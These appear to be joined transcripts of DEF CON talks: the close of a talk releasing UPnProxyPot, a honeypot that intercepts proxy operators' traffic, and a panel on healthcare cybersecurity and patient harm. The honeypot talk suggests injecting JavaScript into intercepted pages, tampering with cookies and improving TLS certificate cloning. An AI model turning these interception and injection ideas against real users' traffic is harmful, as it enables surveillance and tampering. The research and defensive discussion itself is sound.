insurance in Dallas, Fort Worth area. Okay. So it's too organic to be just purely automated abuse, in my opinion. And I'm not sure that the people that are using these proxies are aware that they're using them. I have this theory that it may be some kind of residential proxy reseller or some kind of, you know, ultimate anonymous VPN service provider or something. And these people think that they're getting like these super secret, you know, high privacy stuff. And I'm just sitting here in the middle reading their traffic, which is a problem. So those are my theories. I'd love to hear more theories. You'll also intercept some other stuff outside of TLS. Here, for example, are some spam messages that were being routed. These guys were injecting outlook servers. And then, you know, you can watch the entire interaction, you can watch as they send their, their hello, you can see as they confirm different addresses are deliverable, and then they build their message and shoot it across. You get to see all of that. The good news here is that spam haas is doing God's work and stopping a lot of that abuse from actually succeeding. This was just a fun finding from the older data set. So while this project was going on, Belarus had a very tumultuous political event where a bunch of people went out and protested the recent election. And as a result, Belarus shut down their internet to news and political websites. And while that's going on, suddenly I started seeing these guys popping up in UP and proxy. So the top site was SB.by, which is a news website. And it looks like they were trying to get to the registration and then solve some captures. The other was photo belted up by which is a stock imaging host, I think, or something. But they were actually doing command, not command injections, SQL injections, which I found pretty funny. And then the third one here is mail.rec.gov.by. According to Google translate, this is the central commission of the Republic of Belarus elections or something along those lines. And they were just trying to check their mail. It looks like, and then on the bottom one here, we've got a news outlet, ont.by, and they're trying to get to what appears to be their exchange server. So I just found that kind of interesting. All right. So that's a lot of history, a lot of observations, but now comes the cool part. I'm open sourcing all of this. So anybody that wants to take this, stick it on the internet, play with it, modify it, whatever you want to do, have at it, it's yours. And this way we can all kind of share the fun and see what's going on with these campaigns. And if you find really cool stuff, I'd love to hear about it. So with that open source announcement, let's get some stuff out of the way. First things first, this project was for fun, it's for research. And it was for me to practice my Golang during COVID. Second, I apologize for my shitty code. I know it's shitty. I've learned more Golang since then and learned more design patterns in Golang since then. And I really understand how shitty my code is. I'm sorry. Like I said, it was a research project. It's not commercial grade software. It served its purpose and it did well enough to serve that purpose. And that's all I really needed out of it. Yes, there are bugs. Thank you for noticing. If you open an issue, there's a great chance I'm not going to address it. Maybe someone else in the community will, but this is not my top priority anymore. So I would encourage you to learn some Golang and maybe submit a pull request instead if you'd like to fix that bug. Yes, it's hacky. I know. I am a hacky developer. I'm not your enterprise leading, scrum running, everything else developer. So it is what it is. If you have ideas to fix or improve stuff, it's open source. Have at it, boss. Fork away, send pull requests, whatever. I'll likely accept a pull request. I will likely ignore your issue that you submit to the GitHub. So some ideas for improvements. If you want to hit the ground running, logging could be improved. Content injection could be a thing in a world where people are abusing this stuff. I imagine that you could stick JavaScript in pages or you could tamper with cookies or you could inject plugs of text that might be indexable that you could maybe turn up on a search engine later. I don't know. These are just some ideas I've had. There is a memory leak. I know. The run script actually restarts the binary every hour to get around this because I haven't had time to actually troubleshoot it. Yes, it runs on screen. I regret nothing. Feel free to properly demonize it if you'd like. This I think would be the biggest benefit. If you randomize the SSDP banners and listen on multiple popular exposed UPNP ports, I have a feeling you're going to see a much more diverse set of attackers show up. My findings may be myopic because I'm pretending to be a single device and that single device is what's being targeted by these people. If you were to diversify the target that you paint for your attacker, it's possible you will also diversify your findings. Some additional ideas for improvement. The cert caching. When I wrote this, the cert caching was not taking in S&I differences. It works on Google because all Google servers are just Google. If you were to say have an injection that pointed to some place that had multiple domains associated with it, your one cloned cert is only going to be the one that is aligned with that initial request. You could improve that by in the cert cache, actually using the S&I value, the domain name that was used when that cert was cloned, improved TLS handling, like I said, it was working. It has stopped working. Improving that would probably fix the problem. Improved cert cloning. Cloned more fields to better emulate the remote, the endpoint cert that you're trying to clone. Improved error handling because I didn't really handle any errors. Anything is an improvement. Improved basically everything else. You can find most of the information you'll need in the readme file. If there is anything I missed, please feel free to submit a pull request with the updates you found when deploying the stuff. It's written in Golang, but it does have Linux dependencies. It will run on any operating system so long as it's Linux. You can deploy a node in VPS very easily. You could also run it on Raspberry Pis or Odroid or anything else. Stick it on the DMZ and it will be good to go. Typically, you start to see abuse within the first 24 to 48 hours of deployment. It may be even lower than that. The last thing, if you find something cool, please hit me up on LinkedIn and let me know about it. I'd love to hear if you find new and interesting trends in some of your deployments. That wraps it up. Go grab the project, pull it down, hack it up, compile it, deploy it. Let me know what you find. Go have fun.
|
UPnP sucks, everybody knows it, especially blackhat proxy operators. UPnProxyPot was developed to MITM these operators to see what they're doing with their IoT proxy networks and campaigns. We'll cover SSDP, UPnP, UPnProxy research/campaigns as well as cover a new Golang based honeypot, so we can all snoop on them together! REFERENCES: http://www.upnp-hacks.org (OG disclosure) https://www.youtube.com/watch?v=FU6qX0-GHRU (DEF CON 19 talk I attended) https://www.akamai.com/us/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf (my initial UPnProxy research) https://blogs.akamai.com/sitr/2018/11/upnproxy-eternalsilence.html (additional UPnProxy campaign researcher, also mine)
|
10.5446/54197 (DOI)
|
It's a little too quiet out there. Can we please raise up the volume a little bit out there? This is Defcon! Y'all acting like there's a pandemic out there or something? All right, we're going to kick off this early evening party panel talk here about the most happy topic on the planet, which is what the dumpster fire is going on with healthcare, right? But before we begin with that, I just wanted to say we all really appreciate you coming out here. I'm going to introduce myself quickly, then Replicant at the end is going to talk a little bit. We'll get to introducing the rest of our panel, which is who you truly came here for. Please give it up in the middle here. And then we're going to get to some topics. We'll talk a little bit about the format. Cool. All right. My name is Kowati. Welcome to the Do No Harm panel. We're going to talk a little bit as an introduction about this because this is not the first time we've done this. And perhaps of all the other times we've had this panel this year may be the most important. And so what the hell are we talking about up here? And that's the fact that we're all going to die. And somewhere between now and when you die, you're going to probably interact with a hospital. You're going to talk with doctors and nurses. You're going to have medicines and whatnot. And believe it or not, it ends up that healthcare nowadays is pretty damn connected. And it's all running vulnerable shit. And for the most part, it's been a raging dumpster fire for us as long as I've been around pretty much. That is what this is about. If you're interested about learning of other stuff, there's another really awesome talk going on. But we would encourage you here. And then also we'll have some opportunity to answer questions. Jeff, go ahead and take it. Sure. So for those who may not have come to one of these before, this is actually the fifth year that we've been doing this. And I just want to give a quick shout out because this entire idea started as a conversation between inebriated people in the hotel room of a one Mr. Beau Woods, who's sitting here in the middle with us. And those of us who are adjacent to or exploring this space were like, hey, it's all we're all here at DEF CON. Let's actually sit down and see if we can figure some of the stuff out ourselves. So that has morphed into something that we have been honored and privileged to be able to do at DEF CON now for the last couple of years. And what we really wanted to try to do with each and every iteration, but especially now is give you guys the chance to have conversations with people who are superstars in the fields that we're talking about here, ask your questions, figure out how you can get involved and really face to face with some pretty incredible people. So what we're going to do is we're going to have a little bit of a conversation between us, probably aim for about 45 to 60 minutes on that. And then we'd like to open it up for general questions from the audience. But then at some point we're all just going to kind of split off and move to different parts of the room. We would love to pick your brains, hear from you, and sort of talk about some of these issues in a little bit more personal space. Before we introduce our panel, the last thing that I do want to say is that we had two folks that are affiliated with the federal government who were unable to make it here in person because of travel restrictions. Anybody really interested in hearing from two incredible people should check out our recorded talk, but it's basically Josh Corman from CISA and Jessica Wilkerson from the FDA. And so we wish they were here. I think we're going to hear from Josh a little bit later, but that's the one caveat. Starting down with Quadi, give a little bit more information about who you are, what you're up to, and then we'll go through our panel and introduce ourselves. Hey, I'm Quadi. I am actually an ER doc, so if you meet me at work you're having the worst day of your life. I hope not to meet you in the emergency department, but maybe somewhere else like at a bar. And when I'm not doing work in the emergency department, I do cybersecurity research on medical devices, healthcare impacts of cyber attacks, basically ransomware. How does ransomware harm patients? And then again, sorry, right before we get to Beau who's the next one, we wanted to also say a giant shout out to DEF CON. Fifth year this has been here. We really appreciate this. You guys being out here, got a hell of a thing to put together. Thank you, DEF CON, for all of us at Dino Harms. Go ahead and introduce yourself, Beau. Hi, my name is Beau Woods. I do a lot of different things. I actually started my career in healthcare. I worked at a hospital for about three years in IT and in Infosec. And one of the, I don't know, interesting characteristics that I found is like a lot of healthcare networks are a little bit like archaeology. You find all kinds of things that you thought were dead living in hospitals on the networks where they probably really shouldn't be. More recently, I've been a part of an initiative called I am the Cavalry, which is a global grassroots initiative. A bunch of hackers got together and said, you know, our dependence on connected technology is growing faster than our ability to secure it in areas impacting human life, public safety. And no matter how high and deep we got into federal government and industry, we found that the Cavalry wasn't coming. We realized we were the adults in the room and that scared the hell out of you as it should scare anyone to have some dude with a random blue mohawk who is, you know, the adult in the room. But we have managed to turn that into some really good impact, including, you know, I worked at the FDA for a year on building a new pathway to market for software as a medical device. So like the app on your watch that tells you if you're having atrial fibrillation. Also drafted up something called the Hippocratic oath for connected medical devices, which we may talk a little bit about in a bit. And this led me to do a lot more with healthcare and industry, including starting the device lab at the biohacking village, which if you haven't gone and checked that out yet this year, you really should. It's a ton of fun and they're doing some really good things over there. So I could probably talk all night, but I won't. All right. My name is Gabrielle. I started kind of like Bo my career in science and healthcare. Started out doing pharmaceutical and medical device regulation. Moved into cybersecurity kind of through all of that. And now I currently work as a cloud security engineer in healthcare and also do medical device research and genetic science consulting on the side. Hi, everyone. I'm Stephanie and I started out in the office of security research space focused predominantly on embedded systems. And then about seven years ago, I decided there was this really big need in the healthcare space for security savvy people to kind of come in and help, right, elevate the maturity. And so I spent the last seven years as a consultant in the security for medical device space. So I've worked with medical device manufacturers on just about every stage of securing medical devices. Also with hospitals and healthcare delivery organizations on how do they manage the risk of the medical devices that they have and then even regulators to help them understand what should they be looking at from a cybersecurity perspective before they clear a device for sale, both here in the United States and abroad. And my name is replicant. I am an immature computer hacker and a professional central nervous system hacker. So as an anesthesiologist, I doster brain while people poke you with sharp objects. And I work with Quadi on the academic side of things to take a look at medical device security, infrastructure security and how that's a patient safety outcomes-based issue. So let's just give a big round of applause for everybody other than me. What a great panel. This is usually a little bit more of an intimate affair in a much smaller room. So it's really cool to see everybody out here. At the risk of perhaps boring some people who are very familiar with this concept, I wanted to take the liberty of asking some of our panelists to sort of give a very general 30,000-foot view sketch of some of the topics we're talking about just in case you wandered in here because there's nothing else to do and you are hearing about this type of security for the first time. So Stephanie, we're going to ask you to give a little bit of an overview of what's been going on with medical devices and then Bo to talk a little bit about the infrastructure and policy issues. Yeah, so I'll actually take just 10 seconds to explain everyone just what actually is a medical device. So it's a term that gets thrown around a lot, but it actually has a legal meaning. And so I'm not going to get too boring, but just understand that anything in a healthcare space that helps treat or diagnose a medical condition is considered a medical device. So something like a tongue depressor, that big popsicle stick that they put in your mouth, that is actually a medical device. And so it ranges from the non-digital all the way through the digital that you're probably thinking of with things like pacemakers and insulin pumps. And so understanding all of those are regulated as medical devices, but the potential for patient harm that that device can cause against a patient is what dictates basically what severity of a medical device it is or what class it is. So not all medical devices are treated equally. A class three medical device like a pacemaker is held to a much higher bar from a regulatory perspective. And so understand when we talk about cybersecurity for medical devices, that bar, it's all risk management based game, right? There's no compliance, there's no certification in medical device cybersecurity. It's all risk management based. It is you putting together the story as a manufacturer of here's what I did for cybersecurity, here's how I perceived the risk in my medical device, and then taking that to a regulator and saying, here, I think I've controlled enough of the risks in this device that you should let me sell it here in this country. And so this journey really started back in 2014. So the first regulatory guidance around cybersecurity for medical devices came out from the FDA in 2014, and it was around what we call pre-market cybersecurity. So all the things you needed to do for cybersecurity as a medical device manufacturer to get your device ready to sell. The post-market cybersecurity guidance came out a few years after that, and then that overviewed everything you needed to do after that medical device was approved for sale here in the United States, then what you needed to do for that. The FDA has gone back and they're working on a revision for that pre-market guidance, but it's currently out in draft form. So if you want to see sort of where is the FDA going with the requirements that they're now putting in medical devices, you can read the current draft version of the pre-market guidance that's out. And the FDA has been a really, they've been awesome in this space. They have absolutely been partnering with the security research community, the medical device manufacturers, and they're trying to really grow cybersecurity medical devices without stifling innovation. It's a really, really tough balancing act to make sure that we continue to raise that bar in cybersecurity, but you can't stop innovation in medical devices. And so that delicate balance, and sorry, I won't pontificate forever. No, that was awesome. And then of course, we've just had a smattering in the last like 15 years of vulnerable medical devices that caught some attention, right? So we had the pacemaker, AICDs, devices implanted inside your body that can shock your heart when your heart rhythm starts getting strange, right? Those have been vulnerable and demonstrated to be potentially deadly if attacked. Infusion pumps that control the rate of medication going into patients, those are also been shown to be vulnerable like in 2015. And insulin pumps, I mean, there's a whole host of devices. And it seems like the common thread was a researcher wanted to learn more about it. They bought a device off of eBay or got it somewhere else. And in a short time, they found that something really potentially concerning about patient safety. Awesome. So we're going to go now. It's not just about medical devices. We're going to talk today also about like hospital infrastructure. One of the concepts we're going to talk about is, you know, how can vulnerability, if exploited, impact a person's life, right? Their ability to be diagnosed with a particular disease or get the treatment that they need. And all that stuff that supports that care is all that infrastructure. And so Bo's going to talk a little bit about just an introduction to healthcare infrastructure and its vulnerabilities as well. I'm curious. I know every time we do this, after we step down from the podium and go out into the crowd, always there's like five or six people who come up to me like, man, I work in a hospital. That was so cool. You're talking about the things that I live and breathe every day. So just by show of hands, if you want to raise your hand, who works in or has worked in a hospital dealing with tech stuff? Okay. That's a good number. How many have had loved ones in the hospital or have been in a context in a setting where you were impacted by ransomware or some other type of security incident at a hospital? Raise your hand. Okay. A few people. One of my first days working security at a hospital, we had a network worm that went around and it hit a bunch of servers. Didn't think too much of it. We were able to pop in with a remote desktop or whatever, push some policies out to get rid of it. It wasn't too big of a deal for too long. Probably took us half a day to clean up, which is not terrible. The next day I went in and I got a call from a physician in the natal intensive care unit. The natal intensive care unit, if you don't know, it's where some of the most vulnerable patients in a hospital are. It's premature babies. The patients who they struggle just to take their first breath. They're a little bit behind the curve to start with. The physician who called me up was like, hey, our fetal heart monitors are going up and down and every time they go offline and come back on, they have this windows screen. And it's happening about every 15 minutes or so. I wonder, you know, I know you're not the medical device person, but can you help us out with this? I said, hey, sure, I'll give it a shot. So I knew that we had the network worm the day before, windows screen. So I started going through a quick diagnostic. And it turns out that these fetal heart monitors, which are systems that basically track the premature babies' biorhythms so that the nurses can sit and watch it so that it can feed into the medical care that the doctors give, they were infected with this banking trojan that was meant to steal grandma's, you know, bank password. But instead, it was causing in these devices a reboot every 15 minutes. And so it would lose patient state. And what happens in that case is you have to have a lot more patient care delivered manually by doctors and nurses who are really competent, but it takes a toll. So you need extra doctors and nurses coming in. The consistency will dip if it's not automated because humans are more fallible than computer programs. And so basically these vulnerable patients were at a loss. So called up the manufacturer, the manufacturer said, oh, you know, sorry, that sounds like a malicious software issue. We don't cover that. Said, okay, well, give me the password. I can get into it. I know how to get rid of this. It's not a problem. They're like, oh, we can't give you the password. It's a medical device. You can change something. Like, wait a minute. So there's a virus. There's unwanted known malicious code on this. And I want to put known productive code, you know, the patch that the manufacturer issued and the software manufacturer for the operating system. And you won't let me do that because that's a change, but malicious software is not a big enough change for you to, you know, have a problem with it. They're like, well, you know, that's whatever. They used a line which is a lie that it's a medical device and therefore we can't change it without getting reauthorized by the FDA. Totally not true. And we can talk about that more probably in some of the after chat. So I reasoned that if this device got hit by a piece of malware, a network worm, the vulnerability exists. I can exploit that vulnerability too. So I drafted a justification, went up to hospital leadership, got all the necessary approvals. They thought it through and started just using Metasploit to pop the boxes, drop the patch, kill the malware and get the doctors back to save in lives. Yeah, Metasploit. Hacking for good, right? I mean, we want to use our hacking skills for something good and this was a really productive use. I was able to put the doctors back in charge of patient care rather than being dominated by malicious actors who ended up being in, I think, Morocco and Turkey at the time. So that was like my first introduction to security and my first introduction to healthcare security and it's gotten a lot better since then, fortunately. But that's the type of consequences that you have in healthcare that you don't have in a lot of other industries, right? So worked a lot in banking and retail and other places. A bank system gets hacked and probably not too many people are going to die from that. A hospital system goes down and the consequences are much different. They're materially different. Not just in degree but in kind. In addition to that, you know, you have medical record systems which, you know, we probably have all been to a hospital or at least a doctor's office and had our patient records go into this computing system which allows doctors to track us. It allows us to do a lot more positive things with population health so that we can find causes of diseases so that we can track people through their medical records and be able to treat them if they go from, you know, Dr. A in Sacramento to Dr. B in New York City. So there's a lot of benefits but yet these electronic health systems in some cases were prematurely connected. We incentivized putting these health records in a computerized system but we didn't necessarily incentivize to the same degree securing those systems. In Heimzeit a lot of us in this room look back at it as a mistake and yet there's also scientifically rigorous data that shows that that has helped population health improve. In my more recent life in doing cyber policy and I feel like I can say cyber in this crowd because I live inside the Beltway. I live in DC and I work in talking to policymakers so I promise I will drink later for saying that. But in thinking about some of these issues, oh man I lost my thread, talking about the cybers and drinking. Too much drinking already? Too much drinking already possibly. Well, you know, I am compliant with the 321 rule. I got 4 hours of sleep each of the last 5 or 6 nights so I am ready to go. Although I missed my second meal yesterday and I need to get a second meal today otherwise I'm going to be all out of compliance. But in my role as cyber policy person I've talked to a lot of people in high positions of power and one of those was former president of European nation and after having some of these conversations where before the conversation was all about data confidentiality we started talking about health records. And so the very shorthand version that he came up with was I don't care as much if somebody can read my blood type. I care if they can change it in the system. That would cause a much bigger impact. And while we've spent over the past 5 years about a trillion dollars globally on people product services, most of that has been focused on data confidentiality. And the capabilities that you use for data confidentiality are very different than the ones that you would use to protect the integrity and availability of human life. So I think hospitals and other places where you deliver healthcare are really interesting places where we may not have the hands-on experience to deal with those types of infrastructure in the same way that they need to be handled. So less of a data-focused aspect and more of an impact of physical conditions. And so the infrastructure in hospitals is very different than what we may think of. And so when we apply some of our general rules we might have to think differently a little bit to make sure that we don't inadvertently cause harm to human life. Christian, you've got a great line. I may butcher it, but it's something like as we seek to treat existing pathologies we should be careful not to inadvertently create new ones. That sounds much smarter than I actually am. Yeah, he read that on a fortune. Yeah, so I'll take that one. All right. So yeah, so I want to ask the panel a question and I want to start with Gabb first. But basically like we have these types of conversations every year and one of the most interesting things is what is the change in our thinking from your tier? And obviously we are 18 months now into a global pandemic which is a sentence I would say in med school. But yeah, like you have a very unique and interesting role as part of our response. So what have you learned in the past 12 to 18 months that has really sort of changed your preconceived notions about what we need to be thinking about when we talk about the security in healthcare? I think we've seen a really big stress on our health system and we've seen a lot of hospitals at or beyond their capacity and it's made people realize that yes, we need to figure out what's going on, what we can do to kind of keep this from happening again. And I think we've also seen situations where that max capacity that the hospitals did reach was exploited in some ways. If a hospital is at max capacity and suddenly they are hit by ransomware and malware taken down, that's a huge problem. That's so many patients that have issues. And I know there's been quite a few breaches in the last year. It seems like healthcare breaches have been in the news a lot more than maybe previous years because of the fact that COVID has everything in the spotlight. But I mean, there have been times that the cardiac cath lab went down. They couldn't use any of the materials, machines that they needed to in those labs or use the ICU as intended. And it's just become a lot more of a visible issue, I think. Yeah. And so I'll add on to that. One of the things in working with hospitals at the beginning of the pandemic or before it happened, there was this really growing maturity in how are we handling medical device cybersecurity. There was these really amazing plans about we're going to do micro segmentation, it's going to be amazing, we're going to put all these medical devices. And as soon as the pandemic started, all just crumpled out of throat in the garbage, we're pulling old medical devices out of closets, we're pulling them out of old academic institutes, we're setting up clinics in parking lots. And for good reasons, right? But I mean, that just all those network rules, all the segmentation, just gone, right? So you ended up with this really big spaghetti monster of networking of medical devices now inside of hospitals because they just had to get stuff to work quickly. And on the regulatory side, there was actually relaxing of regulatory requirements for medical device manufacturers to put out updates to medical devices that enabled remote patient care. So a medical device that previously a clinician had to walk into the room and do something to, if a manufacturer was able to put out a software update that removed the need for the clinician to walk into that room and instead maybe task it from a nurse's station, there was actually relaxing of the regulatory rigor needed for the manufacturer to put out that update because they wanted those things to come out quickly. So I support that they did that, but understanding that that also happened as a result. So some of the software updates that were coming out at the time to enable remote care to some of these medical devices did not go through the normal rigor process. And in some cases they did, right? Some manufacturers still did their normal business as usual, but some would have taken that route that was relaxed rigor on what was actually needed from a testing verification perspective of those patches. So you're just now starting to, in the healthcare space, I feel like you're just now starting to see these IT clinicians come out and up and able to breathe and actually say, okay, I need to clean out the spaghetti monster that I made. And so you're now starting to see that bandwidth come back where they're looking back at, okay, how do I re-segment these networks? How do I get these legacy medical devices in a secure network versus just the, like, let's just put it all together and make it work. So I think we're starting to see now that wave of let's kind of clean up that technical debt that we acquired early on in the pandemic. And so we're starting to clean that up. I just want to get anyone in the audience to raise your hand. If you saw a doctor or a nurse practitioner or some other provider on your phone or on your laptop during this pandemic, raise your hand. All right, keep your hand up if you thought that was rad. All right, keep your hand up if you think that that person was behind, like them connecting to the network and viewing your medical record or using the telehealth platform that they did could, you know, hold itself up to like the lowest of skid. Oh, there's like no one up there. Exactly. To continue what Stephanie said was that, like, I'm an ER doc. When the pandemic hit, I put my hacker brain to the side and I thought, like, we're going to be, I remember my, I remember my boss saying, pack a bag. You may, that has to be, you have to live with two weeks of stuff. You may not see your family. You might have to live at the hospital. We don't know how bad this pandemic is going to get. And so my hacker brain was like, all this work that we had done to try to secure these devices and all the fear that I had about this had to go on the side and COVID took the front. And we were, that exactly was the paradigm we had, which was, you know, how can I treat patients at home when they have the only thing I have is a phone for them to call me with. And so it was an explosion of access, almost no regard for commensurate security. And I don't think that, I think that was the right call, right? We were worried about bodies in the streets at that point. I mean, luckily, we, you know, not at least here in the United States, we saw that very often. But I think what it showed to us also was that it is so fragile. It is amazing what actually supports healthcare and how fragile a technology that we are so dependent on is in use all the way around the world. And if it took this awful pandemic for the people paying attention to realize that, you know, it's a virus now, but our dependence and the potential for consequence to human life could very easily be replicated with a pretty large attack, a pretty large ransomware attack, for example. Bo, I want to ask you as somebody more on the policy side, I definitely echo what Quaddy was saying. Like when we were in the thick of it, we were intubating patients in the ICU and running the one ventilators, you know, we were looking for a machine that could deliver positive pressure to a patient with disease lungs. And that's the bare minimum. There were so many inventive solutions, partly from the makers and the hacker space who were able to jerry rig things. Has your thinking at all changed with respect to the threat model? Because we had all this exposure to medical devices and the security wasn't really as much of an issue as we are now seeing with more infrastructure-based attacks. I mean, for the last five years we've been worried about a discreet, individualized medical device. And now we're starting to appreciate the problem differently. Can you talk about your thoughts on that? Yeah. That's a complex question. I'll give a slightly off topic answer, because something that Christian said really triggered me to think about the positive outcomes that we could see. And especially in public policy, some of the positive outcomes. So for those people who raised your hands because you could see a doctor on your phone or on your laptop, that only happened because of a policy change where telehealth, telemedicine is now reimbursable by insurance. I think that's absolutely amazing. Like why have we not had the ability for home health care? Why have we had to go into a doctor's office? Yeah, thank you. Why have we had to go into a doctor's office, take time out of a day or whatever? Why can't we just get on these phones? The technology in the vaccines that most of us have now taken, everybody in this room has been vaccinated. Not everybody has been vaccinated with the same technology. But like mRNA vaccines are absolutely astounding in what the capabilities are. And it kind of took a pandemic for us to unleash some of these things that we've been hypothesizing about for a while and trying to do. I remember I had a conversation with a physiotherapist who, you know, physiotherapy is like very hands-on. You have to touch people, move their arms down and manipulate their body so that their body can recover in a way that helps them get by. And they were doing remote physiotherapy sessions and the person's partner was actually the one who was doing the physical touch. Like think about what that means in terms of a patient. Instead of having a stranger touch you or be there with you, it's your loved one, whether it's a family member, a friend or whatever. I would like to, well, I want to focus on the happy side of it and the fortunate side of it for a minute because a lot of times we just look at the downsides. But I think there's a lot of amazing capabilities that can come out of it. And Jeff, to your question, you know, how does my threat model change? I'm seeing and trying to see, it takes conscious effort because we're wired differently than a lot of other people. I want to see the benefits, the silver linings and look at what can come out of this that we could then use to create the next generation of patient care and the next generation of more convenient, more effective medicine and health that we can deliver to people around the world. Okay, we're going to ride that amazing uplifting sentiment to the top of the roller coaster and we're going to go right back down, okay? And I think that is, we'll start off by saying, you know, the vaccine was amazing and we have an expert on this panel to discuss that. But I mean, Gab, how close were we to like one ransomware attack to having six months delaying the vaccine? Like that is terrifying shit. Think about how many people would die. And I'm kind of curious because you have some insight. Yeah, definitely. It was bad. There were a lot of attempted attacks to either glean some vaccine information from what we had or just to kind of see what we were up to. And that would have upended everything. I mean, we were working really hard to kind of get everything out as fast as we could. The trials, some of them are running concurrently, phase two, three, four. A lot of the sites performing the trials, I mean, I can tell you that the review of those was really scary and kind of quick. It was run through really quick. And yeah, just anything that would have toppled that house of cards that was barely being held together would have been horrifying. And it would have pretty much stopped everything completely in its tracks and taken down whatever work we had already had. And it doesn't sound, I guess, that bad since we're past that point. But there is no reason it couldn't happen again. So at the risk of asking you to tutor on Hornbow, I mean, you and Josh, she's not here with us tonight, but you were hired at SISA specifically for the purpose of protecting this type of research infrastructure and vaccine delivery. What did the feds do right in this situation for once? He's going to have to pass on that, sorry. Hard pass. But we just want to reiterate, you know, Gav is talking about so much of the research infrastructure, the collection of data, the clinical trials, the technology to develop the vaccine, to then manufacture the vaccine. If you really take a 40,000 foot view of that, you can know as a hacker how many very vulnerable links in that chain there were. And if only one broke, if one data center containing the critical stage, sorry, phase two clinical data was inoperable and accessible, that they'd have to redo all of that. And it could put us months behind. And it's not just the citizens of the United States that would have suffered, but that vaccine coming to market even days or weeks later would have resulted in thousands of deaths. It's amazing that we didn't think about this stuff ahead of time, or maybe we did. And I just wanted to give a shout out to the hacker community and say this. You know, I grew up a hacker and I really think we are the ones that are screaming, this stuff is on fire. It's not just smoke. It's on fire. We need to fix it. And we've been saying this for a long time. And I think I hope after this, they're going to take us a little bit more seriously and really being able to fix this to some more appreciable amount. So next time something like this happens, it's not nearly as bad. So that's really like give yourself a pat on the back, okay? All right. I'm going to play a clip of Josh Corman given about a four minute. So he was supposed to be on this panel. He couldn't be on this panel. I'm going to go over this podium. I'm going to play a four minute clip. I want you guys to pay attention. And just to give you a tiny bit of a primer, this is a discussion about patients lives. So I often get asked, show me the body count, right? I'm so like, you talked to me until you're blue in the face, Quadi, about how bad this is in healthcare, but show me someone who's died. And this is kind of the primer. Can someone be injured by this? So by the way, Bo, my question was a test and you passed it. These are things that affect national security, national economic security and national health and public safety. The one that's been in the red zone and the purple zone for the most of the pandemic is called provide medical care. And this is what two of you do professionally every day. We looked at severe strains throughout the pandemic initially noticing a new problem because the pandemic, which was cascading failures. So it used to be that if you had a ransom or an outage or some power problem, you would merely divert ambulances the next nearby facility. And that's kind of predicated on the next nearby facility being able to receive anybody. So when everyone's at a saturated level or in the red zone themselves, a failure in any single hospitals tended to have cascading stressors or failovers in nearby facilities. So Christian, I heard in your amazing testimony to House Energy and Commerce similar sentiments. So we started studying that as well. Then we started looking at something very poorly covered in the media, but the CDC tracks something really important every year, every month called excess deaths. And this is the difference between expected deaths and actual deaths by condition by month by state and at the national level. And when the US hit that February milestone of 500,000 lost Americans to COVID, we also hit a different milestone of 150,000 lost Americans to non COVID conditions that are otherwise treatable, very treatable. The number one aid demographic of that was 25 to 44 year olds. So young folks that could have been saved, but for excessive loads on our healthcare delivery across the country. So these are things like time sensitive things like heart attacks, strokes, cancer, where time matters, minutes matter, hours matter, days or weeks. So Christian and others on this panel in the past, we often cite the New England Journal of Medicine article that says 4.4 minutes during a marathon could be the difference between life and death and increased mortality rates for heart attacks. We know with strokes, the difference between life and death could be one, three or four hours. So what did four weeks of interruption in the state of Vermont do with the UVM Medical Center and 118 facilities in upstate New York for Montt and New Hampshire. So again, where minutes matter, we know that delayed and graded patient care affects outcomes, including mortality rates. You know, we were deeply concerned about this and almost done some of these truth bombs. But when we looked with data scientists for the first time, this fusion center, we started to say is their relationship between capacity levels and mortality rates and for access deaths. And we're starting to share this with the public data, but without getting into the inflection points, we did see a strong and positive correlation between something like ICU bed count and excess mortality, excess deaths two, four and six weeks later. So we got a kind of a leading indicator that we could tell if a hospital or region, a state was going to incur excess deaths if they were starting to reach too high of a capacity level. And then asked the really tough question, I think, do no harm cares about, which is can cyber disruption precipitate or accelerate or cause that harm to worsen. And of course, we know fire is hot and water is wet. So of course, any degraded and delayed patient care from any source can do this. But we did start asking uncomfortable questions and look at the state's hardest hit by that concerted effort to disrupt health care during the month of October and November. And adjusting for all the rare, all other variables in a state like Vermont, it was very clear that electronically disrupted hospitals achieved that excess death red zone much faster than their peer group. So again, if minutes and hours of the difference in life and death, and you're in a geography that can't get to the next nearby facility, we should stop asking, can cyber attacks lead to loss of life? We've answered the question. There's enough statistical evidence now to show this. Wow. That was makes you feel happy inside, doesn't it? This is what we're talking about. Is it's really important to protect patient health information. It's really, really important to realize that in medical conditions where minutes matter, the hospital infrastructure if under attack and you could get worse care. I wanted to play that clip at the request of Josh's panel just to discuss briefly kind of your reflections of that because for the longest time we've gotten so much criticism and some of you out there in the crowd may have this, they've shown me the body count. You know, is this a turning point? Are we seeing more and more data? Can we now more reliably conclude that patient harm is real when a hospital gets ransomed? And what the hell do we do about it? I'm going to lay that out there. I mean, I think if you can listen to what Josh said and still think that there isn't a correlation immediately and that there isn't a body count, then you're not listening. What can we do about it? That's really hard. If you work at a hospital or you have worked at a hospital, then you already know that in some cases the choice between buying another Blinky Box or hiring a CISO, the trade-off for that is maybe you then can't buy an MRI machine or you can't hire another physician or nurse or other type of clinician. Those are really hard trade-offs to make. So when we sometimes sit back and for those of you who haven't worked in healthcare and think, well, you know, just patch stuff or just get somebody who knows what they're doing, if you're a clinical access or a critical access facility that there's no other hospital for 100 miles, let's say, you got eight beds, you got five or six doctors, a handful of nurses, which nurse is going to be your IT person? Probably none of them. But they're in the position where you can't really hire somebody in that local area because if you have IT talent, a lot of times you go to the bigger city because there's a salary there that you can't match locally. And a lot of these places are really struggling. If you look at the 20, I think it came out in 2017, the HHS Healthcare Cybersecurity Task Force report, they looked at a lot of really important profound truths and surfaced those and put them into a nice page one graphic that are here are the problems in healthcare. But they went beyond that and they said, here are some of the things we can do about it. Everything from public policy steps to some things individuals could do, things hospitals could do, carrots and sticks, incentives and punishments. And I think there's some good blueprints in there, including, for instance, can we have managed service providers that cater to the needs of these hospital workflows so that if you have an anti-spam filter and you get a bunch of emails from labs that might trip a threshold, you don't block the emails that are coming in from labs where it's critical treatment information coming in. How can we create some of the incentives that would allow for those managed service providers to do that so that you can scale up security protections or scale them down to the size that fits some of these small organizations that are really cash strapped? How can you do several other things? So I'd encourage you to go take a look at that. It's government reports are a little bit dry, but go check it out. And has anybody ever called your hospital to volunteer? Hey, do you guys need some help? I have a certain skill set and expertise. I'd like to see if I can help you. That might also be a step you can take or trade in, temporarily trade in a high-price job for one that's maybe a little bit lower salary, but in one of these healthcare areas where you can make a huge difference to somebody. I'm getting a thumbs up there. I take it that at least one or two people in the audience have done something like that, so it is doable. 